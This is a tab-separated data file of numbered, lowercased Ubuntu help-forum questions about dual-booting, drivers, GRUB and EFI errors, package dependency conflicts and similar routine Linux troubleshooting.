390846	graphic gibberish in a s3 super savage/ix	i installed ubuntu 12.04 using the windows installer on a toshiba tecra 9100 ( vintage ~2002 ) with windows xp professional . when i boot to ubuntu , the screen image is a mess indicating some sort of graphics problem . i tried to post a picture , but my reputation is not high enough.with the messed up graphics nothing is usable right from the start . the graphics processor is an agp 4x - s3 super savage/ixc - 16mb . do you have any suggestions ? am i doomed to having a paperweight ? p.s . computer has 512mb of memory
390847	new ubuntu install / partitoning	i have a none booting vista on one hard drive , will installing ubuntu on a partition let me see both ubuntu & vista on start up ? would it repair vista enough to use or rather not overwrite any info ? ? ? ? ? newbie mbr/grub/bootloader ? ? ? i also had remove sata hd to boot from usb into ubuntu , will this cause any problems reconnecting before installing ubuntu thanks
390850	ca n't see files ( created by windows ) on ntfs partition	i have a ntfs disk that is used to share all my media files between windows 7 and ubuntu . unfortunately after i saved some new videos there using windows i ca n't see them in ubuntu . it just wont `` refresh '' and show the new .avi files . they work pretty well in windows . ubuntu linux was hibernated and the ntfs volume mounted . why is this happening ?
390852	unetbootin does not show ubuntu 12.04	unetbootin does not show ubuntu 12.04 lts . i do not see a way to force an update of the list . am i doing something wrong ? thanks in advance
390853	laptop not booting to ubuntu 13.04 after installing windows 8	i have a laptop ( hp pavillion n-series ) which has got inbuilt ubuntu and now i installed windows 8 from the cd . i can no longer boot through ubuntu but can only open windows 8 . i would like to access both the operating systems through my laptop . i have tried using easybcd2.1.2 but i can not find ubuntu under it . plz help me out asap
390859	wifi not working on acer aspire 5570z	the ethernet works but the wifi does not . i have updated everything and it had no help . and i know that it works because less then 24 hours ago it had windows vista on it and would work . i am running ubuntu 12.04 32 bit .
390860	problem with adding ppa in ubuntu 13.10	when i want to add any ppa in terminal it give me this error : can not add ppa : 'ppa : flacon/ppa ' . please check that the ppa name or format is correct . but when i turn on openvpn i could add ppa ! but i want to add ppas without turning on vpn . what i have to do to solve this problem ?
390862	manually turn off firewall/unblock ssh port	ubuntu server 12.10 last night i was messing with ufw , so i can enable some ports on the machine . little did i know i just blocked port 22 . hours later closing putty , i tried to connect to the server again and could n't . fortunately , my server provider , ovh , has a rescue mode to reconfigure files . so i 'm in the server again , using the rescue-mode option , i do n't know how to reconfigure to disable ufw or unblock the port . how can i ? simply sudo ufw disable does n't work . rescue mode in ssh says debian gnu/linux . ovh says `` you will need to manually mount the hard drives , then you can edit the file causing the issue '' , but how do i manually mount ? also tried opening via iptables , and it looked like it worked but restarted , still timed out from ssh .
390865	install ubuntu with the windows installer - few questions	: = ) i have few question about install ubuntu with win installer . anyone who can help i will be grateful . i have down win installer . i have hd with 3 partitions . first is win7 , second my stuff , third is for ubuntu . 1 : when i run win installer i get options where i want to install i mean which partitions-that is understandably , second option is instalition size . well this is question . my 3rd partition is about 60 gb big so what is difference between 12gb and 30gb installation , is it about quantity of software is install or something else ? 2 : do i need to format my 3rd partition from win or it will format during install of ubuntu . 3 : i have 64bit cpu , is the ubuntu which i down 64bit or 32bit . 4 : when i choose every options in win installer and he down ubuntu he ask me to restart comp . when restart is done is he give me 2 option for boot : win 7 and ubuntu and when choose ubuntu is then begin installation ? 5 : did i need to know some stuff during installation . i mean this on some options . that is all question for now . : ) sorry if this question is already somewhere answer , i have search before posting but not find some similar answers . thanks in advance .
390866	when will ubuntu be able to dualboot with windows 8.1	that 's all i want to know because i tried to do partitions on my computer to dualboot windows 8.1 and ubuntu but it is all too confusing for me and i would like to be able to set it up with no problem at all .
390869	disable super / winkey key in remmina	i use remmina all the time and this is driving me mad . i ca n't figure out how to disable the winkey key . when i connect to a remote computer ( a windows computer ) from ubuntu 13.10 & remmina , when i press e windows explorer opens . when i press l the computer locks , d shows the desktop , and so forth . it 's as if the winkey key is stuck on my keyboard . i am going crazy having to use the character map . worse yet , now with the ever-so-awesome windows 8 start menu , or lack of , i can not even browse to the character map . i have to type character map . but if anyone uses windows , you 'll know what happens when you hold the winkey and start typing c-h-a-r-a-c-t-e-r m-a-p. how to solve this ?
390871	where is wine located on a fresh ubuntu installation ?	well , i 've installed ubuntu & so far i love it . but is it just me or did wine not come with the installation as cited here i 've used the previous version on the same machine with it included , up & running great . i understand it 's in the software center & i can just download it from there . but , where is it on my newly installed os ? no searches of my system have found it ?
390875	is there any non-linear presentation software for linux like prezi desktop	i like non-linear presentation software like prezi . the problem with prezi is it is not open source and not a desktop client ( for linux ) . you will say use libra-office impress but it is linear and i hate that . if there is n't any non-linear presentation software for linux like prezi desktop , than is there a plugin that make libra-office impress like it or apache openoffice ? i want a desktop client , and not a web-base app ! [ 1 ] linear presentations are those presentations in which the flow of the presentation is controlled by the person who is presenting . the concept is frequently employed in multimedia applications and presentations . an example of linear presentation is a pre-recorded movie presentation . sources http : //www.ask.com/question/what-is-the-definition-of-linear-presentations
390879	need help manualing installing audio driver	i 'm new to unbuntu/linux ( version 13.10 ) i have a super micro motherboard x7dal-e+ , which i need to install realtek audiopack . in sound settings it does n't seem to recognize the audio , i only see `` dummy output '' in the option to play sound through . there is a readme.txt with instructions , that come with the drivers i downloaded from the supermicro website . most of the steps are foreign to me and unclear . if someone can explain better each step that would really help me out . keep in mind i have only been using linux for about a month . the source code copy from www.alsa-project.org . ver:3.3-4 linux source code for alc audio codec support codec list : ====ac97 codec===== alc100,100p alc200,200p alc650d alc650e alc650f alc650 alc655 alc653 alc658 alc658d alc850 alc101 alc202 alc250 alc203 ====hd audio codec ==== alc260 alc262 alc267 alc268 alc269 alc272 alc660 alc660vd alc662 alc663 alc861 alc861vd alc880 alc882 alc883 alc885 alc888 alc889a installation : this source code is from www.alsa-project.org . for os installation , please remember add the development tool kit . for driver installation , please follow below steps . automatic install : ( recommend redhat distribution ) execute ./install note : ubuntu os , please use manual install . run commands need to add sudo at first words . manual install : step 1. unzip source code tar xfvj alsa-driver-1.0.xx.tar.bz2 step 2 . turn on sound support from kernel config ( soundcore module , default turn on ) step 3 . complied source code a. cd alsa-driver-1.0.xx b . ./configure c. make d. make install e. alsaconf f. ./snddevices ( only kernel 2.4 does it ) step 4 . edit your /etc/modules.conf or conf.modules depending on the distribution ( please refer to the attached modules.conf ) snd-xxxx is the card id . -- azalia controller -- alc880 alc882 alc260 alc262 alc883 alc885 alc888 -- - intel ich6 ich7 -- -- -- -- - snd-hda-intel -- ac97 controller -- alc655 alc650 alc250 alc255 -- - intel ich6 ich7 , sis 7012 and nvidia -- -- -- -- -- snd-intel8x0 -- - via8233 via686a -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - snd-via82xx -- - ati chipset -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - snd-atiixp copy and paste this to the bottom of your /etc/modules.conf or /etc/modprobe.conf file . # alsa portion alias char-major-116 snd alias snd-card-0 snd-xxxx # oss/free portion alias char-major-14 soundcore alias sound-slot-0 snd-card-0 # card # 1 alias sound-service-0-0 snd-mixer-oss alias sound-service-0-1 snd-seq-oss alias sound-service-0-3 snd-pcm-oss alias sound-service-0-8 snd-seq-oss alias sound-service-0-12 snd-pcm-oss step 5. reboot your machine step 6 . use the alsamixer the disable mute ( all audio line default is mute ) *must to compile and to install the alsa library and utility . ( use automatic install is already install ) excute alsamixer note : 1 . the most detail information , can refer the alsa-kernel/documenttation/alsa-configuration.txt in the azx-021705.tar.bz2 . 2 . kernel version must be 2.2.14 or later . 3 . all mixer channels are muted by default . you must use a native or oss mixer program to unmute appropriate channels . 4 . if can not compile the source code , try to rename the /usr/src/linux-2.x - > /usr/src/linux . 5 . the driver added to support the spdif functoin . 6. a . you can download the alsa-lib-1.0.9 and alsa-utils-1.0.9a form the www.alsa-project.org , then unzip and install them . b . suggest use `` alsamixer '' to control mixer function . c. used `` alsaconf '' can autodetect which drive you need to install ( step 4 ) . 7 . suse distribution must install the ncurses package . i have got past the first step unpacking the code : p but dont know where to begin for step two . cheers
390881	install java 6 besides java 7 on ubuntu 13.10	java 6 could be installed besides java 7 on ubuntu 13.10 ?
390883	lxc with openstack	i have successfully deployed openstack havana using juju and maas . virt type is lxc . what kind of images should i use to be able to launch lxc containers from openstack and how to overcome the lack of volume support to add storage ? any leads will do : ) thanks !
390884	ubuntu 13.10 resolution	sorry if vague , new to ubuntu . upgraded from 12.04 when i managed to break that , now in 13.10 and can not get resolution above 1024x768 . from my searches looks like that ; s a common problem . looking for advice if there is a quick fix ? or should i revert back to a lts version ? i have no allegiance to 13.10 just wanted to try a newer version . should mention i 'm on a gateway nv79 , graphics : vesa : intel速ironlake mobile graphics when trying to use xrandr i get : xrandr : failed to get size of gamma for output default
390885	simple media scraper/.nfo creator	i 've been hunting around the web for a good .nfo file creator for my media files . so far i have n't been able to track one down that does what i want . most of them seem to be full out media managers . i keep my media on an external drive and do n't want the .nfo generating program to worry about keeping track of anything because i do n't actually use this machine for viewing any of the media . my ideal program would : allow me to choose a file/folder containing specific types of media files ( music , tv shows , movies ) match the files online with a scraper using the standard sources ( tvdb , etc . ) rename files using the scraped data generate .nfo files using the scraped data filebot has been an excellent tool for doing steps 1-3 , what would be really nice is if there was a plugin for it to generate the .nfo files . ( i have n't been able to find one yet ) anywho . my question is . does anyone know of a good piece of existing software for doing this ?
390886	efi disk read error and secure boot error before grub splashscreen	i have finally got ubuntu and windows 8 booting correctly under efi on dell i660 . however i am seeing error message right before the grub splash screen - error : efi disk read error . ( x3 ) these are followed by - secure boot forbids loading module from /boot/grub/gettext.mod then it loads the grub2 splash screen for ( grub version 1.99-21ubunutu3.10 ) . is there something i can do to fix these errors . /boot looks ok and boot-repair did not help . if i disable the secure boot in bios i get rid of the loading module error , but am still getting the efi disk read errors . are there are logs that i can look at ? nothing surprising in /var/log/*.log . thanks !
390887	how to decrypt information from package versions ?	what these numbers mean ? take look at concrete example from aptitude : chromium-codecs-ffmpeg-extra could be upgraded to version 31.0.1650.63-0ubuntu0.13.10.1~20131204.1 , but it is being held at version 30.0.1599.114-0ubuntu0.13.10.2 . why so many numbers ? how can i tell whether i should upgrade or not ? the last thing i want is to prevent upgrades in future because newer software might require older packages . i do n't recall holding this package and others as well .
390888	password reset will not let me type	i tried doing the password reset but , when i went to enter in the new password it would not let me type . i went into the root section entered passwd and then my user-name and it went into the aria where it allows you to reset it and it would not let me type . i tried multiple times still with no luck .
390889	thinkpad t61 , ubuntu 12.04 , fingerprint scanner	i have a thinkpad t61 running ubuntu 12.04 and i need some help getting the fingerprint scanner to work . any help is appreciated , thank you .
390898	install ubuntu and windows 8 is gone	i just bought a computer with pre-installed windows 8 . after the installation , the computer boots but windows option is not displayed . i tried boot repair but i get an error message saying that needs to umount a partition and gets into an endless loop . here 's the log file http : //paste.ubuntu.com/6575169/ any idea of what can be wrong ?
390900	add clipboard event sounds	how can i add sound when system clipboard is updated ? i use xclip under tmux , but other apps probably do n't . which interface should i use ? ideally this should work on all window managers ( unless there is good reason against that idea ) .
390904	how to make file and streaming server ?	i have this desktop computer im not using . i want to use it for file storage for all types of files . i also want to share these files to windows computers and stream video to tablet and phones . the streaming will be only localy what software do i need and how would i go about this ?
390905	how to extend main partition with gparted live cd	i booted with gparted and it shows my main partition and an extended , wiht linux-swap inside ( i do not know what this is ) and i have about 17.00 gb of free space on a new partition but i cant seem to merge . when i click on the main partition and put resize it does not give me any options to merge , resize , etc . update
390907	win 8 notebook install x551ca	i bought a asus x551ca notebook today with windows 8 installed . i upgraded the os to ubuntu . while doing so i made a new partition table . the pc wont boot to grub , it goes straight to bios . has anyone had this problem ? how did you fix it ?
390911	why are n't my bold colors displaying properly ?	i am trying to get solarized to work in the gnome-terminal , tmux , and vim . it has been a chore . just when i thought i had them set up properly i noticed that my bold font colors are n't displaying correctly in vim . this is a problem because the html bolds all tags . so i started a hunt and came across : http : //superuser.com/questions/512138/urxvt-bold-colors-are-wrong-bold-0-7-are-using-colors-from-8-15 which explained that i need to change my .xresources to urxvt.intensitystyles : false did that . still no luck . i am not at my wit 's end trying to get this to work . i was hoping somebody out there had an idea . i am using ubuntu 13.10 . i am using the default gnome-terminal and have tried changing term : xterm and xterm-256color . i used this simple bash script to check my results https : //gist.github.com/benizi/4173926 and here is a screenshot
390914	can not install google-chrome-stable on ubuntu 12.10 because of libnss3 ( > = 3.14.3 )	my vimium plugin stopped working in google chrome so i uninstalled it order to get install newer version . i can not get to install it anymore because of incorrect dependency version on libnss3 package . i tried to reinstall the package but it reinstalls to the same version . here is the output of the installation failure : $ sudo apt-get install google-chrome-stable reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : google-chrome-stable : depends : libnss3 ( > = 3.14.3 ) but 3.13.1.with.ckbi.1.88-1ubuntu7 is to be installed e : unable to correct problems , you have held broken packages . tried to install libnss3 to that specific version with : sudo apt-get install libnss3=3.14.3 but it does not find that version .
390915	ubuntu not working for usb	i have a usb 64gb ( ntfs ) . i installed ubuntu 13.10 in the flash drive using unetbootin . then i try to boot my usb . it keep showing me some kind of error saying `` bootmgr is missing . press ctrl+alt+delete to restart . '' so i do n't know wat 's wrong with it . anyone know how to fix this ?
390916	windows boot manager	i have downloaded ubuntu 12.04 , and set it up using the unetbootin on my 8gb flash drive and when i get to the windows boot manager it does not allow me to boot up from ubuntu . it keep sending me to a screen saying there is something wrong with windows and that i have to fix some file , but when i choose windows to boot from it works perfectly . i have also turned off quick boot .
390919	everything opens in archive manager	everything i 've tried to install has opened in archive manager . even if the file says that it 's executable it still opens in archive manager . there are n't any executable files inside the archive either . there also is n't any other software to open the files with . how do i make it so it opens an installer instead of the archive .
390922	13.10 hangs at splash on reboot after nvidia/bumblebee install	i 'm a fairly long-time user of ubuntu and this is my first question here . i 'm always able to find a solution to a problem from someone else 's question until now . i 've recently upgraded from 13.04 . nvidia ran perfectly okay on my 13.04 system . but now that i 've installed 13.10 ( from a fresh install , not an upgrade ) nvidia seems to freeze my system . in 13.04 i had the option to install nvidia from the additional drivers section in my system settings but this option was not available in 13.10 and i 'm forced to use the nouveau drivers . i tried installing bumblebee and bumblebee-nvidia because i 'm using a laptop . this resulted in an unbootable machine where it hangs on the ubuntu splash screen just before login . im able to hit ctl+alt+f2 to get to tty2 and then purge nvidia and bumblebee in order to revert back to using nouveau and be able to boot normally again . i also tried just installing nvidia-current , nvidia-319-updates as well as nvidia-331 to no avail , all having the same problem . i also tried doing this on the latest linux kernel 3.12.5. what i have n't tried is installing kernel 3.8 and then installing nvidia then . should i ? what i do n't get is nvidia is able to be installed in 13.04 but not in 13.10. surely it 's something to do with unity/lightdm or maybe something that was added/removed from the kernel after 13.04 . i do n't know how to interpret logs so please help me to identify which logs to look at and diagnose . thanks in advance . here 's a rundown of my system : macbook pro 6,2 intel® core™ i7 cpu m 620 @ 2.67ghz × 4 8gb ram geforce gt 330m with 512 mb of dedicated gddr3 sdram intel hd graphics with 256 mb of ddr3 sdram ubuntu 13.10 64-bit
390924	lubuntu 13.10 ca n't detect my wireless card	i installed lubuntu 13.10 on an old dell netbook and i ca n't seem to connect to wifi . in fact i do n't think lubuntu can even see the wireless adapter . i tried ifconfig but only see my ethernet . i have a small amount of linux knowledge but have n't used it in a couple years .
390930	update the kernel on usb ?	i boot 13.10 64-bit from a usb so i can use my work laptop for personal stuff : p is there any way to update the kernel ? i tried once to do a dist-upgrade and it made the usb unbootable ( i had to rebuild the usb )
390931	sharing home partition across multiple ubuntu oses ?	i currently have ubuntu 13.10 installed with a separate root and home partition on my drive . i want to install elementary os luna as well . would it be okay if i had the two operating systems share the same home partition as long as i use different usernames ?
390932	ubuntu black screen after loader	i 'm running ubuntu 12.04 . it should be noted that i am not at all knowledgable of how ubuntu works , but i have a tendency to mess around with things . after attempting to fix some problems i was having with my graphics , i went to my system settings and attempted to hit the update button . update manager ran , but informed me that i had to do a `` partial update '' , and i , not knowing exactly what that meant , went forward with it . after it ran , i restarted my system , and now i have no way of getting past the loading screen . when i boot up the computer , my dell splash runs , then it goes to black for a second , then the purple ubuntu loader comes up and seems to mount my filesystem . after that , it goes dark , and then the screen lights up , as though about to display something . however , it never actually displays anything , not even the login . i 'm unable to cycle through to the 6 terminals . restarting the system in recovery mode also does not work , for whatever reason . it mounts the filesystem , and then freezes , no matter which option i choose . the only way i have been able to get the system to work by allowing me into a text terminal that actually did anything is by holding shift at the loader , highlighting the first option in the menu for booting up linux in 3.8.0-34-generic , pressing e , and finding the line where it says linux . i then replace the words quiet splash with nomodeset , which allows me to work in a terminal . at this point , i have no clue what to do . i 've tried following several answers for seemingly similar problems about this , but none of them have worked . at this point , i 'm even willing to let my files go if i can just reset everything back to factory condition , should i need to . since i 'm totally new at this , and do n't know what i 'm doing , i probably have n't put enough information here . if more information is needed , and you can tell me how to get it , i 'll try to post comment updates about it asap . thanks in advance for any help .
390933	latex line 66 missing number , treated as zero \end { frame } problem	i have this script \documentclass { beamer } \usepackage [ latin1 ] { inputenc } \usetheme { warsaw } \usepackage [ english ] { babel } \usepackage { lmodern } \usepackage [ t1 ] { fontenc } \usepackage { array } \usepackage { graphicx } \usepackage { multirow } \usepackage [ font=scriptsize , format=plain , justification=centering , labelformat=empty ] { caption } \usepackage { textcomp } \usepackage { animate } \title [ bose-einstein condensates and superfluidity ] { bose-einstein condensates and superfluidity } \author { pablo ramos and alessandro genova } \institute { rutgers university } \date { december 17 , 2013 } \begin { document } \begin { frame } \titlepage \end { frame } \begin { frame } \frametitle { table of contents } \tableofcontents \end { frame } \section { introduction } \begin { frame } \frametitle { what is a bose-einstein condensate ( $ bec $ ) } \begin { columns } \begin { column } { 0.6\textwidth } \begin { enumerate } \item collection of bosons ( particles integer spin ) at temperatures near to 0 \ \textdegree k \item if the system is describe by $ n_i=\frac { g_i } { e^ { ( \epsilon_i-\mu ) /kt } +1 } $ \begin { itemize } \item particles collapse $ \rightarrow $ lowest quantum state \item quantum effects become apparent on a macroscopic scale . \end { itemize } \item fritz london proposed bec as a mechanism for superfluidity in 4he and superconductivity . \end { enumerate } \end { column } \end { columns } \end { frame } \begin { frame } \frametitle { experimental evidence of bec } \begin { columns } \begin { column } { 0.6\textwidth } \begin { itemize } \item kapitsa , allen and misener discovered he-4 $ \rightarrow $ superfluid , at $ t < 2.17 $ \textdegree k ( $ \lambda $ point ) . \item first `` pure '' $ bec $ was created by cornell and wieman $ \sim $ dilute vapor $ \sim 2000 $ rb-87 atoms $ t < 170 \ nk $ . \item $ bec $ applies to quasiparticles ( solids ) . a magnon in an antiferromagnet ( s=1 ) -boseâeinstein statistics . \end { itemize } \end { column } \begin { column } \begin { center } \includegraphics [ width=0.6\textwidth ] { pictures/bec1.jpg } \end { center } \end { column } \end { columns } \end { frame } \end { document } and it is telling me the following error line 66 missing number , treated as zero \end { frame } could anyone help me with this ?
390937	unable to boot ubuntu on a surface pro 2 with virtualbox	i 'm trying to run ubuntu through virtualbox . but i get this error : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . i 'm on a surface pro 2 . surface pro says it does support virtualization and it is enabled . one thing i did notice is when creating the virtual machine in virtualbox under the version menu , it does not give me the option for ubuntu ( 64-bit ) , only regular ubuntu ( which is x86 i suppose ? ) i do n't understand because the surface pro 2 is 64 bit . please advise
390939	why the kernel does n't update automatically ?	i have two servers running 12.04 lts . # 1 has upgraded to kernel 3.2.0-57 . # 2 is stuck on 3.2.0-34 . # 2 is getting all other package upgrades . but , the kernel is never upgraded . this is what i have researched : /etc/apt/sources.list are identical on both servers . the repository caches are identical , verified by : apt-cache search , and : dpkg -l linux-image . i have done : sudo apt-get update on the faulty server . i have done : sudo apt-get upgrade on the faulty server . i have verified that the kernel is not `` pinned '' by the following : apt-mark unhold linux-image-3.2.0-34-generic the system replied : linux-image-3.2.0-generic was already not hold why do n't this system upgrade the kernel when it gets other packages without a problem ? aptitude is apparently working as other packages seem to update . the cache and source list are the same .
390941	ubuntu 12.04 installation with windows8.1 pre-installed	i have a laptop with windows8.1 pre-installed . now i want to install ubuntu12.04 and do n't want to remove windows . i have disabled window8.1 faststartup . in my bios , i ca n't find fastboot or quickboot . then i tried several times , it always show the error `` the grub efi package failed to install into target '' . it drive me crazy . anyoone knows how solve this ?
390946	easystroke type button action not triggered	i have configured easystroke to define mouse-gestures for the forward and back navigation buttons for browsers . when i invoke these gestures in chrome or in firefox , easystroke immediately detects them correctly . however the assigned mouse button is not invoked until i make another mouse click with any button . this does not happen with the `` key '' -type actions , which work just fine . i could not find any relevant bug-report for this . it does not seem like an easystroke bug . more like a x-server bug or bad configuration of the x-server in ubuntu . i was not getting this behaviour prior to 13.04 . at the moment i know to little about the nature of this problem in order to file a bug report myself . any pointers on how i could troubleshoot this problem further would help . thank you .
390948	ubuntu sdk not getting installed 12.04	first i used the compound command given here but it gave some errors so i executed each command separately that i may be able to figure out the where is the error . adding repository and updating was fine but : asim @ ubuntu : ~ $ sudo apt-get install ubuntu-sdk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu-cordova but it is not going to be installed e : unable to correct problems , you have held broken packages . asim @ ubuntu : ~ $ i decided to install qtcreator-plugin-ubuntu-cordova separately then : asim @ ubuntu : ~ $ sudo apt-get install qtcreator-plugin-ubuntu-cordova reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : qtcreator-plugin-ubuntu-cordova : depends : qtcreator-plugin-ubuntu ( = 2.8.1bzr56precise0 ) but 2.8.1bzr57precise0 is to be installed e : unable to correct problems , you have held broken packages . asim @ ubuntu : ~ $ here i thought forcing the right version of the package would work fine but again : asim @ ubuntu : ~ $ sudo apt-get install qtcreator-plugin-ubuntu-cordova =2.8.1bzr57precise0 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package asim @ ubuntu : ~ $ can somebody help me ? i 've been doing web development in php but i 've just decided give a try to software development on ubuntu . edit apt-cache policy qtcreator-plugin-ubuntu-cordova qtcreator-plugin-ubuntu ubuntu-sdk gives : root @ ubuntu : /home/asim # apt-cache policy qtcreator-plugin-ubuntu-cordova qtcreator-plugin-ubuntu ubuntu-sdk qtcreator-plugin-ubuntu-cordova : installed : ( none ) candidate : 2.8.1bzr56precise0 version table : 2.8.1bzr56precise0 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ precise/main amd64 packages qtcreator-plugin-ubuntu : installed : 2.8.1bzr57precise0 candidate : 2.8.1bzr57precise0 version table : *** 2.8.1bzr57precise0 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status ubuntu-sdk : installed : ( none ) candidate : 1.009~sdkppa~precise1~test6 version table : 1.009~sdkppa~precise1~test6 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ precise/main amd64 packages
390951	uninstalled new installation of ubuntu 13.10 - error message user appdata folder	uninstalled new install 13.10 and it was working fine , i just needed to reinstall with an encrypted folder . now i could uninstall it successfully but ca n't copy the complete wubi file without an error , and the machine wo n't boot except in windows 7 . the usb is disabled ( a new harddrive and both thumb drives do n't load with the drive volumes and network devices ) . how can i start over , when i ca n't find the user appdata folder the error message gives me ?
390952	ubuntu 13.10 slow boot	i need help . my computer boots very slow . here is the bootchart file : how to fix this ?
390953	canon rebel camera	i installed software for canon camera in wine and it did n't work well . i went to wine uninstaller and removed some utilities but cant get them all out need to remove them and a suggestion on a way to get a canon software for linux or something that will work well
390960	mercurial - how to migrate from default install to more recent vesrion ?	i have a headless ubuntu 12.04 - 32 bit with mercurial 2.0.2 installed on it . i have a number of hg repos on this machine but i would like to use recent version of mercurial . how can i best migrate from the current installation to a more recent version ? btw i did think about using a ppa but i think the whole business sounds too fragile for something i rely on day to day so that 's why i just want to upgrade to a more recent version now and i 'll repeat the process down the road a bit . in case it matter this is what dpkg shows : ( venv ) ~/dev/mathsmish $ dpkg -- get-selections | grep ercur mercurial install mercurial-common install
390966	one terminal will launch rails - another one wo n't !	good sirs : when i right click in the desired directory and choose `` open in terminal '' , ubuntu seems to have no idea that i have rails installed . rails -v shows it as not installed ... but when i ctrlaltt and cd to the exact same directory , i can run rails -v , create a new project , etc ... why this behavior ?
390972	delete total line in nano ?	some times while i am editing my files with nano i am facing difficulty while deleting some big line , i need to hold del key for long time . is there any shortcut i can found to delete the total line at a time ? i have checked the man-page , still no use . thank you .
390974	if you go xubuntu , do n't you have to have a relatively current ms os ?	if i dual boot my xp with xubuntu , then april comes around and the xp part is no longer supported by ms , are n't i likely to get a virus and wo n't that mess up the whole computer ? it 's as if you still need a supported ms os ( if you 're at least partly going to use ms-based programs ) even if you go linux , right ?
390976	can not paste or make new folder on file system directly with out gksudo nautilus ?	i have installed ubuntu 12.04 , but i can not paste or make new folder in file system , however i can paste new files with gksudo nautilus , but how can i do directly without gksudo nautilus ? ?
390979	need help getting mupen64plus to work on ubuntu	my info : os : xfce raring device : chromebook acer c720 lately i 've been successfully figuring out how to compile , or get the latest repos for emulators , installing the latest builds and such . but one emulator gives me so much trouble . mupen64plus . the n64 emulator best for ubuntu . i first added a ppa , from sven ecklemann . this installs mupen64plus 2.0 , but now i do n't know how to use it after . i understand that there 's no gui , and you 're forced to use the terminal for it . so in terminal , i type `` mupen64plus [ rom directory and rom name ] '' but i get an error , it does n't want to load the z64/v64 file . the roms are in my flash drive in a folder . i then tried downloading the source of the latest build , but dear god it 's complicated . i have no idea how to build it . i 'm basically stuck , to asking questions . searching usually gives me results i 'm not looking for . any help running this emulator would be appreciated . wine with project64 is not an option , the games run at unplayable speeds . though wine does work with mupen64 0.5.1 , which is really ancient . 2005 vs 2013 also , i had no luck getting a frontend to work , after installing mupen64plus . i installed m64py frontend , and when i launch it , nothing happens . my main concern is to get mupen64plus working , with a frontend of any kind . this fight seems to be for nothing , banjo tooie crashes , and zelda majora 's mask crashes occasionally too . paper mario has flickering . this is what 's shown on the compatibility list .
390981	access latest xubuntu desktop remotely ?	there are so many conflicting and outdated info on this , but what is a good way to set up a remote desktop server on xubuntu 13.10 saucy ? so far i have seen people use vino , x11vnc , vncserver , and others , but which one has the least resistance ? i do n't want to end up at dead-end or point of no return . any help or advise would be greatly appreciated !
390982	update from natty to raring causing malloc memory corruption error	i updated my laptop from previously using natty to recent ubuntu raring and everytime i run every gnome app or even e17 , i always got something like `` malloc ( ) : memory corruption : 0x084a8468 '' i even ca n't get gdm running using gdb got following when running shotwell starting program : /usr/bin/shotwell [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . [ new thread 0xb4f03b40 ( lwp 11800 ) ] ** ( shotwell:11796 ) : warning ** : could n't register with accessibility bus : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . *** error in `/usr/bin/shotwell ' : malloc ( ) : memory corruption : 0x084a8468 *** i tried to reinstall libc6 , but the problem still persist this really frustrating since i almost can not do anything with gnome please anyone point me something to fix this
390985	scrolling with a touch screen	on a touchscreen , dragging your finger around behaves like you are using a mouse . is there any way to make dragging on a touch screen scroll rather than select the text ? i 'm running ubuntu desktop 13.10 with kernel 3.11.6-amd64
390989	is the samsung galaxy s3 supported ?	can i put ubuntu os on the galaxy s3 ? if so can i please get the steps to do so ? thank you !
390990	restore formated parttion using g-parted in ubuntu 12.04	i was trying to create window 8 boot-able usb disk from a .iso file . i used unetbootin . instead of formatting my usb in unetbootin , by mistakely i formatted my another important ntfs partition to ntfs by g-parted manager . this partition contains everything . have not overwrite any files on this ntfs partition . formatted partition is sda5 as showning in following link . can i restore it ?
390991	ubuntu 13.10 grub menu does not appear	okay i just installed ubuntu 13.10 successfully on my friend 's laptop , he wanted me to make dual booting with kali and ubuntu . i installed ubuntu only in one new clean hdd ( no grub at this point ) . i then resized it and made another partition and successfully installed kali linux at the new partition . then i rebooted after kali 's installation . but grub menu does n't appear at all and boots directly into ubuntu 13.10 . i tried gedit /etc/default/grub and tried to change grub hidden timeout=0 into grub hidden timeout=10 but i could n't save it because the system says that i do n't have permission for it . i checked the bios and found out that the boot priority was set to ubuntu before my hard drive . so i changed the boot priority into hdd first and then ubuntu for second . it did not work . what 's the problem ? is ubuntu 13.10 only compatible with grub 2 ? because kali 's grub is 1.99 or something . i need quick help please . i 'm new , and i barely typed any commands in terminal.i 'm trying to be as detailed as possible .
390992	how can i install xampp on directory cd/var/www in ubntu ?	i have insatlled ubnutu 12.04..and install xampp , it is working properly but it is installed in opt/lampp/htdocs instead /var/www ... how can i fix it ? ?
390995	help locating linux/version.h	i 'm trying to fix an old program , previous issues i had could be found at missing modversions.h when i make the program it gives me the following error , kaodv-mod.c:22:27 : fatal error : linux/version.h : no such file or directory compilation terminated . so i ran find / -name version.h which returns /opt/vboxguestadditions-4.3.2/src/vboxguest-4.3.2/vboxguest/include/vbox/version.h /usr/include/linux/dvb/version.h /usr/include/linux/version.h /usr/src/linux-headers-3.8.0-29-generic/include/config/arch/want/ipc/parse/version.h /usr/src/linux-headers-3.8.0-29-generic/include/generated/uapi/linux/version.h /usr/src/linux-headers-3.8.0-29/include/uapi/linux/dvb/version.h /usr/src/linux-headers-3.8.0-29/include/xen/interface/version.h this clearly proved that linux/version.h is present in order to fix this , should i change # include < linux/version.h > into # include < /usr/include/linux/version.h > or is it possible to make changes to the makefile p.s : makefile
